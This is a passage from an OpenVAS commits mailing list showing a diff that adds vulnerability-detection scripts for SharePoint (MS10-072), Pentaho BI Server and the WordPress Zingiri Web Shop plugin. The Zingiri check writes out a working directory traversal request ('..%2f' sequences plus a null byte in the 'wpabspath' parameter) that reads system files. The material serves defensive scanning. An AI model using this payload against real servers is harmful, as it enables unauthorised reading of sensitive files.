+  script_description(desc);
+  script_summary("Check for the vulnerable file version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Windows : Microsoft Bulletins");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+
+## MS10-072 Hotfix
+if(hotfix_missing(name:"2345304") == 1)
+{
+  ## Microsoft SharePoint Server 2007
+  key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
+
+  if(registry_key_exists(key:key))
+  {
+    foreach item (registry_enum_keys(key:key))
+    {
+      appName = registry_get_sz(item:"DisplayName", key:key + item);
+      if("Microsoft Office SharePoint Server 2007" >< appName)
+      {
+        dllPath =  registry_get_sz(item:"BinPath",
+                              key:"SOFTWARE\Microsoft\Office Server\12.0");
+
+        if(dllPath)
+        {
+          dllPath = dllPath + "web server extensions\12\ISAPI";
+          vers  = fetch_file_version(sysPath:dllPath,
+                                   file_name:"Microsoft.office.server.dll");
+          if(vers)
+          {
+            ## Check for Microsoft.sharepoint.publishing.dl version < 12.0.6539.5000
+            if(version_is_less(version:vers, test_version:"12.0.6539.5000"))
+            {
+              security_hole(0);
+              exit(0);
+            }
+          }
+        }
+      }
+    }
+  }
+}
+
+## Hotfix check
+if(hotfix_missing(name:"2345212") == 0){
+  exit(0);
+}
+
+## Microsoft Windows SharePoint Services
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+foreach item (registry_enum_keys(key:key))
+{
+  srvcName = registry_get_sz(item:"DisplayName", key:key + item);
+  if("Microsoft Windows SharePoint Services" >< srvcName)
+  {
+    dllPath =  registry_get_sz(item:"SharedFilesDir",
+               key:"SOFTWARE\Microsoft\Shared Tools");
+
+    if(!dllPath){
+      exit(0);
+    }
+
+    dllPath = dllPath + "web server extensions\12\BIN";
+    dllVer  = fetch_file_version(sysPath:dllPath, file_name:"Onetutil.dll");
+
+    if(!dllVer){
+      exit(0);
+    }
+
+    ## Check for onetutil.dll version < 12.0.6545.5002 for Sharepoint services 3.0
+    if(version_is_less(version:dllVer, test_version:"12.0.6545.5002"))
+    {
+      security_hole(0);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_pentaho_bi_server_mult_vuln.nasl 17105 2011-09-21 11:11:11Z sep $
+#
+# Pentaho BI Server Multiple Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902568);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2009-5099", "CVE-2009-5100", "CVE-2009-5101");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Pentaho BI Server Multiple Vulnerabilities");
+  desc = "
+  Overview: The host is running Pentaho BI Server and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  - Input passed via the 'outputType' parameter to ViewAction is not properly
+    sanitised before being returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in
+    context of an affected site.
+  - Password field with autocomplete enabled, which might allow physically
+    proximate attackers to obtain the password.
+  - Disclosure of session ID (JSESSIONID) in URL, which allows attackers to
+    obtain it from session history, referer headers, or sniffing of web traffic.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary script
+  code in the browser of an unsuspecting user in the context of the affected
+  site or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Pentaho BI Server version 1.7.0.1062 and prior.
+
+  Fix: Upgrade to Pentaho BI Server 3.5.0 GA or later,
+  For updates refer, http://www.pentaho.com/download/
+
+  References:
+  http://secunia.com/advisories/37024
+  http://www.securityfocus.com/archive/1/archive/1/507168/100/0/threaded
+  http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
+  http://jira.pentaho.com/browse/BISERVER-2698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ";
+
+  script_description(desc);
+  script_summary("Check for the Password field with autocomplete enabled in Pentaho BI Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 8080);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:8080);
+if(!port){
+  exit(0);
+}
+
+## Send and Receive the response
+req = http_get(item:string("/pentaho/Login"),  port:port);
+res = http_send_recv(port:port, data:req);
+
+## Confirm the application
+if("Pentaho BI Platform" >< res)
+{
+  ## Check for the Password field with autocomplete enabled
+  if('<td colspan="2"><input type=\'password\' name=\'j_password\' '+
+                                          'size="30" ></td>' >< res)
+  {
+    security_warning(port);
+    exit(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl 17226 2011-09-21 13:16:16Z sep $
+#
+# WordPress Zingiri Web Shop Plugin Remote File Inclusion Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902729);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("WordPress Zingiri Web Shop Plugin Remote File Inclusion Vulnerability");
+  desc = "
+  Overview:
+  This host is installed with WordPress Zingiri Web Shop Plugin and is prone to
+  remote file inclusion vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input passed
+  via 'wpabspath' parameter to /wp-content/plugins/zingiri-web-shop/fws/ajax/
+  init.inc.php, which allows attackers to read arbitrary files via a
+  ../(dot dot) sequences.
+
+  Impact:
+  Successful exploitation could allow attackers to perform directory traversal
+  attacks and read arbitrary files on the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  WordPress Zingiri Web Shop Plugin Version 2.2.0
+
+  Fix: No solution or patch is available as on 21th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://wordpress.org/extend/plugins/zingiri-web-shop/download/
+
+  References:
+  http://packetstormsecurity.org/files/view/105237/wpzingiri-rfi.txt ";
+
+  script_description(desc);
+  script_summary("Check RFI vulnerability in WordPress Zingiri Web Shop Plugin");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_wordpress_detect_900182.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get WordPress Installed Location
+if(!dir = get_dir_from_kb(port:port, app:"WordPress")){
+  exit(0);
+}
+
+## traversal_files() function Returns Dictionary (i.e key value pair)
+## Get Content to be checked and file to be check
+files = traversal_files();
+
+foreach file (keys(files))
+{
+  ## Construct directory traversal attack
+  url = string(dir, "/wp-content/plugins/zingiri-web-shop/fws/ajax/" +
+                    "init.inc.php?wpabspath=", crap(data:"..%2f",length:3*15),
+                    files[file],"%00");
+
+  ## Confirm exploit worked properly or not
+  if(http_vuln_check(port:port, url:url,pattern:file))
+  {
+    security_hole(port:port);
+    exit(0);
+  }
+}



More information about the Openvas-commits mailing list